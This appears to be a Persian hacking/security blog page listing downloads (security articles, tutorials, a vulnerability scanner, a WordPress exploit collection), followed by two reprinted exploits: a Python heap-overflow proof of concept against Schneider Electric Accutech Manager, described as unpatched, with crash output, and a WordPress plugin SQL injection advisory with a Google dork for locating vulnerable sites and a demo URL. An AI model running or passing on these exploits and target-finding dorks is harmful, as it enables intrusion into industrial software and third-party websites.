با سلام و عرض خسته نباشید خدمت دوستان عزیز
اینبار برای شما عزیزان یکسری مقاله ی کوتاه از وبسایت دانشکده MIT امریکا با موضوع امنیت رو انتخواب کردم و براتون قرار دادم که امیدوارم نهایت استفاده رو ببرید .
به امید دیدن ایران در رتبه اول علمی دنیا
جهت دانلود به ادامه مطلب مراجعه فرمایید...
سلام دوستان
امروز برای شما عزیزان یک فیلم اموزشی از حفره امنیتی lfd فراهم کردم که امیدوارم به درد شما عزیزان بخوره .
در این فیلم اموزشی شما با نحوه جلوگیری از این حفره امنیتی میز اشنا میشید .
جهت دانلود به ادامه مطلب مراجعه فرمایید...
با عرض سلام و خسته نباشید
امروز برای دوستان مقاله ای پیرامون حملات ldapi فراهم کردم که امیدوارم به دردتون بخوره
حهت دانلود به ادامه مطلب مراجعه فرمایید
اموزش کامل و جامع asp.net
اموزش جامع و کامل php
اموزش جامع و کامل sql
اموزش جامع و کامل جاوا اسکریپت java script
اموزش جامع و کامل html 1, html 2 , html3 ,html4 و html 5
اموزش کامل و جامع css 1, css 2 و css 3
اموزش کامل وجامع ado.net
همه و همه در 50 مگابایت !!!!!!!!!!!!
بله تعجب نکنید
جهت مشاهده به ادامه مطلب مراجعه فرمایید
Acunetix Web Vulnerability Scanner Consultant Edition 8.0.2012.12.13 Retail نرم افزاری است که اسکریپت ها و وب سایت های شما را اسکن می کند و اگر مشکلی در مقابل باگ های SQL Injection, XSS و … بود سریعاً به شما اطلاع می دهد. آیا وب سایت شما قابل هک شدن است؟ امروزه تقریبا ۷۰ درصد سایت های اینترنتی باگ و راه های نفوذ دارند بدون آنکه خودشان اطلاعی داشته باشند. توسط این نرم افزار می توانید وب سایت خود را برای تزریق SQL، کراس سایت اسکریپتینگ و آسیب پذیری های دیگر اسکن نمایید. این نرم افزار دارای ابزارهای پیشرفته تست نفوذ نظیر ویرایشگر HTTP، Sniffer، Fuzzer و … می باشد. شما هم اگر صاحب وب سایت و یا وبلاگی شخصی هستید می توانید با استفاده از این نرم افزار قدرتمند سایت خود را اسکن کنید و در صورت وجود هر گونه راه نفوذ و یا باگ در سایت، راه حل و روش برطرف کردن آن را از طریق همین نرم افزار مطالعه کرده و به رفع مشکل بپردازید. اسکن برنامه های کاربردی وب ۲٫۰ و آخرین فن آوری های وب، از دیگر ویژگی های این برنامه می باشد.
سلام دوستان خسته نباشید
این دفعه براتون یک کتاب جالب تهیه کردم که به شما میگه چطور یک وبسایت ایمن داشته باشید.
توی این کتاب که به زبان انگلیسی هستش با انواع متود های lfi,rfi , sqli ,xpath, buffer over flow و سایر حملات که زمان محدود اجازه نمیده براتون بنویسم اشنا میشید .
امیدوارم که به کارتون بیاد . جهت دانلود به ادامه مطلب مراجعه فرمایید
سلام دوستان
در این قسمت براتون یک مجموعه اکسپلویت از cms ورد پرس (word press) تهیه کردم که توی اون باگ های مشهور و مختلف زیادی هستش امیدوارم به دردتون بخوره.
برای دانلود به ادامه مطلب برید :
Schneider Electric# #
#Accutech Manager Server Heap Overflow PoC
#RFManagerService - Port: 2537
#I think this is the same vuln that ExodusIntel discovered. Credit also goes to Aaron Portnoy, ExodusIntel.
#The patch has not been released yet.
#Evren Yalcin, Signalsec Ltd. (www.signalsec.com)
#Download app:
#http://telemetry.schneider-electric.com/id2/media/downloads/software/scadarange/Accutech%20Manager%201.89.2.zip
import socket
import sys
host = "192.168.163.128"
port = 2537
buf = "\x41" * 400
req = ("GET /" + buf + " HTTP/1.1\r\n"
"Host: " + host + ":" + str(port) + "\r\n")
print " [+] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(req)
data = s.recv(1024)
s.close()
#(d40.e8c): Access violation - code c0000005 (!!! second chance !!!)
#eax=41414141 ebx=00fd0000 ecx=41414141 edx=0b2999a8 esi=0b2999a0 edi=00000005
#eip=7c91142e esp=0ba3fc28 ebp=0ba3fe48 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
#7c91142e 8b39 mov edi,dword ptr [ecx] ds:0023:41414141=????????
#----snip----
#text:0040DE91 push offset aReceivedReques ; "Received request, parsing...\n"
#.text:0040DE96 call nullsub_1
#.text:0040DE9B lea eax, [ebp+cbTransfer]
#.text:0040DEA1 push eax ; char * ; GET /AAAAAAAAAAAAAAAAAAAAAAAAA
#.text:0040DEA2 push esi ; int
#.text:0040DEA3 call sub_40E006
#.text:0040DEA8 add esp, 0Ch
#----snip---
#call sub_40E006 function copies GET data to staticaly sized heap buffer.
# Exploit Title: wordpress post2pdf-converter v2 Plugin SQL Injection
# Google Dork: inurl:wp-content/plugins/post2pdf-converter inurl:id=
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: www.bmwvindecoder.net
# Software Link: www.near-mint.com
# Version: 2.0
# Tested on: Windows 7
###################################################################
Location:site/wp-content/plugins/post2pdf-converter/post2pdf-converter-pdf-maker.php?id=[SQL]
#
#
#DEm0:http://bmXindecoder.net/wp-content/plugins/post2pdf-converter/post2pdf-converter-pdf-maker.php?id=1
#########################################################
* Greetz to: My Lord Allah
* Sp Tnx To:
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad?,Black-H
ole,Classic,Encoder,ERroR,Hashor
*
HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBes
tMan,Mute,N4H,Pr0grammer,PrinceofHacking
* Rizux,rlsi2020,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X
* Crypt0,khatarnak,Milad22,MrR.CICILI,V1R4N64R,Pirjo
* And All Of My Friends
* The Last One : My Self, tr0janman
***************************************************************
###############################################################
آدرس جدید ما